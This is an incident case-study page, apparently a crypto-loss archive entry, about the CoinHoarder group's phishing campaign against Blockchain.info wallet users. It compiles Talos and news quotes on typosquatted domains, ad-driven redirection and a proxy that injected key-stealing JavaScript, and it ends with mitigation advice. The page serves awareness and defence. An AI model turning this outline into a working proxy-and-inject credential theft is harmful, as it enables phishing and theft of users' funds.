$50 000 000 USD





"The world’s most popular crypto wallet. Over 80 million wallets created to buy, sell, and earn crypto." "As they say, not your keys, not your crypto. Blockchain.com Private Key Wallets are the most widely-used wallets for self-custody of your crypto. We make it easy for people who are ready to control their private keys to hold them with a Secret Private Key Recovery Phrase." "When it comes to ensuring that your crypto is secure, we think about every last detail so you don’t have to."


"According to a report published Wednesday, February 14th by Cisco’s Talos Intelligence Group, a team of Ukrainian hackers dubbed CoinHoarder has stolen more than $50 million in cryptocurrency from users who were under the impression they were accessing Blockchain.info, one of the most popular providers of virtual currency wallets." "[S]ecurity researchers teamed up with Ukraine’s Cyberpolice unit to uncover a phishing scam that was going on for at least three years."


"In February 2018, a criminal group, dubbed Coinhoarder, managed to amass a total of $50 million in cryptocurrencies since 2015 – including an amount of $2 million that was taken in less than a month during 2017."


"The campaign was based on the simple premise of setting up fake websites mirroring the immensely popular online wallet website, Blockchain.info." "According to coindesk.com, the perpetrators set up fake sites with similar but slightly different domain names to Blockchain.info, like “blockchien.info”, targeting specific geographic areas."


"The hackers then ensured a steady purchase of Google AdWords in order to infiltrate search results of users looking to access Blockchain.info and position their fake websites in a favorable spot." "This meant people Googling terms like “blockchain” or “Bitcoin wallet,” saw links to malicious websites masquerading as legitimate domains for Blockchain.info wallets."


"The poison ads included “spoofed” links with small mistypes like “blokchien.info/wallet” and “block-clain.info,” which sent visitors to pages that mirrored actual websites of the company Blockchain, which runs both the domains Blockchain.info and Blockchain.com."


"Once users accessed the fake site, they would be fed phishing content in their native language, determined according to their geographic region that was revealed through their IP address."


"This campaign targeted specific geographic regions and allowed the attackers to amass millions in revenue through the theft of cryptocurrency from victims. This campaign demonstrates just how lucrative these sorts of malicious attacks can be for cybercriminals. Additionally, the revenue generated by these sorts of attacks, can then be reinvested into other cybercriminal operations."


"Cisco identified an attack pattern in which the threat actors behind the operation would establish a "gateway" phishing link that would appear in search results among Google Ads. When searching for crypto-related keywords such as "blockchain" or "bitcoin wallet," the spoofed links would appear at the top of search results. When clicked, the link would redirect to a "lander" page and serve phishing content in the native language of the geographic region of the victim's IP address."


"The domain block-clain[.]info was used as the initial "gateway" victims would first visit. Victims would immediately be redirected to blockchalna[.]info, the landing page where the actual phishing content was hosted. These fraudulent sites are mostly hosted on bulletproof hosting providers based in Europe."


"As soon as the user enters the wallet, or creates a new one, downloading from the JavaScript site, Nginx on the fake server replaces it with his own. These functions, when initializing the wallet, send to a special address POST-request with data: sharedkey, password, secondPassword, isDoubleEncrypted, pbkdf2_iterations, accounts. "Accounts" contain xpub and xpriv keys for each wallet. If the wallet data is encrypted with a double password, it decrypts and sends this information to its server. An interesting fact is that two-factor authentication will not help in this case."


"The nginx server works as the proxy of the original site, with the exception of JS file "my-wallet", which uses the module "Lua nginx" to add malicious functions that are executed after authorization and send to the server a private key of the user, after which its balance is automatically checked and the transfer is carried out."


"The account 18xaP8AmpRDAUiqiXsELtKQFzicC78BnYh was stolen at 2017-11-11 22:41:12 from a blockchain.info wallet. The 2FA was activated and no seed stored on any pc. Also not backup. The 2FA was with google authenticator on a smartphone. The bitcoin is being splitted on two accounts: 13wahvu3FP8LK8P51UmEkhBUhyC7mzkrn3 and 1KDFTGoWXceeZxqUk5wHjnViPEkCdJeU1V. If you check the movements of these wallets you can see they are doing the same to many accounts. The blockchain support answered with a copy/paste generic email, but not more help. The police is already informed and let us see if they can do something...this is frustrating. How can this happen?"


“The attackers needed only to continue purchasing Google AdWords to ensure a steady stream of victims,” the Talos team — led by Jeremiah O’Connor and Dave Maynor — said in their report. Cisco, which investigated the “massive phishing campaign” for more than six months in partnership with Ukraine’s Cyberpolice, noted that the Coinhoarder group’s method has since “become increasingly common in the wild, with attackers targeting many different crypto wallets and exchanges.”


"Cisco found that the Coinhoarder scam disproportionately ensnared those from underbanked regions where cryptocurrency has caught on as an alternative means of storing wealth: Residents of African countries such as Nigeria and Ghana made up the majority of those who landed on the malignant websites." "Using data from Umbrella Client Requester Distribution queries to these malicious domains, we can see a significant number of DNS resolution requests coming from countries such as Nigeria, Ghana, Estonia and many more." "According to a report on the issue published on Tripwire on February 15th, 2018, African countries were persistently targeted by the Ukrainian group, which managed to snatch $10 million just in the last four months of 2017."


"According to blockchain.info security experts, this phishing campaign is one of the largest in the company's history. We believe that this group started its activities at the end of 2014, and in 3 years their total income from criminal activities may exceed hundreds of millions of US dollars."

Blockchain.info was one of the most popular online wallets for bitcoin and other cryptocurrencies. The platform provided a JavaScript back-end to clients, which would allow them to manage their own private keys locally. A group of phishers from Ukraine set up mirror website which looked identical, at very similar URLs. The content was pulled directly from blockchain.info as a proxy, with the only modification being code which allowed the extraction of the private key. Users would interact with what they thought was the blockchain.info website, only to find that their funds mysteriously disappeared. While law enforcement appears to have tracked down the criminals responsible, it does not appear that any funds have been recovered.


Private keys need to be stored offline, and should never be handled in a website environment. Blockchain.info can require an email confirmation when users request access from a new IP address, and only grant access if that link is clicked from the same IP as requested access. Keys can be a shared multi-sig between Blockchain.info and the end user to prevent unauthorized transfers.


Check Our Framework For Safe Secure Exchange Platforms

Sources And Further Reading

 For questions or enquiries, email info@quadrigainitiative.com.

Get Social

  • email
  • reddit
  • telegram
  • Twitter

© 2021 Quadriga Initiative. Your use of this site/service accepts the Terms of Use and Privacy Policy. This site is not associated with Ernst & Young, Miller Thompson, or the Official Committee of Affected Users. Hosted in Canada by HosterBox.